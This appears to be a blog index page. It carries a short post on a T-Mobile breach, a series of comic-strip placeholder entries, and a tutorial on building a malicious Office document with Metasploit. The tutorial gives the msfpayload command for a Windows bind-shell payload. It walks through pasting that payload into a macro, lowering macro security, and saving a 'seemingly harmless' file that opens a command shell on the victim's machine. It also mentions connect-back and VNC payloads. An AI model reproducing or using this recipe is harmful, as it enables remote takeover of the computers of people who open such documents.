Severe T-Mobile Data Breach

From the looks of it, T-Mobile has been hacked and the goods stolen.

They also seem to love running HP-UX.

Share

Writing malicious macros using metasploit

This is actually a nice little feature of Metasploit which many of us are not aware. Here I will guide you through this.

Metasploit is nice tool written in ruby and very useful to penetration testers (and script kiddies) It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. Latest release is 3.1 version as of now and its upcoming version 3.2 will be more hack-pack.

Enough of insight into metasploit, now back to action. We will create a malicious .doc file which will spawn a tcp shell on port 8888 on simply opening the file. However remember that MACROs must be enabled on victim’s system.
1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. type cd %APPDATA%
3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba
4. Now to use this malicious vba file, open Microsoft Word/Excel.

5. Go to tools–>Macros–>Visual Basic Editor. Copy the contents of vba file and paste in the VB editor.


6. To enable macro tools–>Macros–>Security. Select the security level as low.

You get this alert window up when macro is disabled.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet on that port to spawn a command shell.


So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.

Share

Hacked #11 (comic strip)

Hacked, eleventh strip of this new comics.

Hacked #11

Click on the image for full size.

Share

Hacked #10 (comic strip)

Hacked, tenth strip of this new comics.

Hacked #10

Click on the image for full size.

Share

Hacked #9 (comic strip)

Hacked, ninth strip of this new comics.

Hacked #9

Click on the image for full size.

Share

Hacked #8 (comic strip)

Hacked, eighth strip of this new comics.

Hacked #8

Click on the image for full size.

Share

Hacked #7 (comic strip)

Hacked, seventh strip of this new comics.

Hacked #7

Click on the image for full size.

Share

Hacked #6 (comic strip)

Hacked, sixth strip of this new comics.

Hacked #6

Click on the image for full size.

Share

Hacked #5 (comic strip)

Hacked, fifth strip of this new comics.

Hacked #5

Click on the image for full size.

Share

Hacked #4 (comic strip)

Hacked, fourth strip of this new comics.

Hacked #4

Click on the image for full size.

Share

Hacked #3 (comic strip)

Hacked, third strip of this new comics.

Hacked #3

Click on the image for full size.

Share

Hacked #2 (comic strip)

Hacked, second strip of this new comics.

Hacked #2

Click on the image for full size.

Share

Hacked #1 (comic strip)

Hacked, first strip of this new comics.

Hacked #1

Click on the image for full size.

Share